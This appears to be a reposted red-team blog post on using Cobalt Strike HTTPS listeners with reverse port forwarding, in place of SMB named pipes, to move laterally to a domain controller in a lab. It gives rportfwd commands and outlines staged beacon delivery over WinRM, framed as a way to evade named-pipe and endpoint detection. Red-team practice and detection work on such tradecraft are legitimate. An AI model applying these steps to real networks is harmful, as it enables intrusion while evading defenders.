Lateral Movement With Cobaltstrike

渗透技巧 1年前 (2023) admin
236 0 0

In this short blog, we revisit the realm of Cobalt Strike and explore the somewhat undocumented advantages of utilizing HTTP(S) listeners during lateral movement over typical or traditional approaches involving SMB pipe and reverse TCPs listeners. We’ll also learn how to use HTTP listeners instead of SMB/TCP for simulated red teaming operations. Furthermore, we set up a small active directory network to perform a practical. The peer-to-peer listeners are super helpful when dealing with lateral movement. It doesn’t require any reverse port forwarding and an internet connection to reach redirectors. It uses named pipes to receive and send data; the protocol is SMB.

So, what’s the issue? Huh?

Firstly the named pipe is easy to detect. There are many public blogs to detect SMB-named pipes; one is called Hunting & Detecting SMB Named Pipe Pivoting. The same thing happens with the Sleep-mask kit. It doesn’t work as expected with SMB listeners and easily gets detected in memory by Endpoints, but HTTP(S) listeners don’t get detected with the same configuration.

Setting Lab Environment

Lateral Movement With Cobaltstrike

The lab consists of three machines. We assume we have a compromised machine; in our case, it’s WIN. The domain controller (in our case DC01) is in a completely different subnet. To get a beacon on DC01, we must set up an SMB or TCP listener. But keeping the goal of the blog in mind, we use HTTPS listeners to achieve this goal.

Required Steps

  • Start a reverse port forwarding on the compromised computer
  • Create an HTTPS listener with “HTTPS Hosts” and “HTTPS Host (stager).”
  • Execute generated DLL/Shellcode on the target computer.
  • And we should have a running beacon.

Demonstration in our lab

Reverse Port Forwarding

To start a reverse port forwarding, in Cobalt Strike, we have a command called rportfwd. We need to pick one port, i.e., our listener port. We can start an optional port if any web is required to upload.

rportfwd 4443 <TEAMSERVER_IP> 4443
rportfwd 80 <TEAMSERVER_IP> 80
Lateral Movement With Cobaltstrike

Setting up a Listener

We start a listener with the IP Address of Subnet-1 SO THAT THE DC01 can communicate with it. The “HTTPS Hosts” and “HTTPS Host (Stager)” should match the IP Address of the other subnet we are targeting. In our case, the Subnet-1’s IP address is 192.168.64.128. The port should be the same; we started a reverse port forwarding (4443).

Lateral Movement With Cobaltstrike

We already have port forwarded 80, so we can generate a scripted web delivery to execute on the remote target.

Lateral Movement With Cobaltstrike

Execute Beacon!

Once everything is configured correctly, we can execute the command on DC01 using Winrm to get a beacon.

Lateral Movement With Cobaltstrike Lateral Movement With Cobaltstrike Lateral Movement With Cobaltstrike

That’s how to use HTTP(S) listeners if there are custom rules to detect malicious named pipes.

Conclusion

Using named pipes is a good idea, but sometimes it can cause multiple issues and can get one caught. A better way Is to effectively use HTTP(S) listeners with reverse port forwarding, as the HTTP(S) listeners are perfect among others.

原文始发于0xEr3bus’s Blog:Lateral Movement With Cobaltstrike

版权声明:admin 发表于 2023年7月31日 下午6:05。
转载请注明:Lateral Movement With Cobaltstrike | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...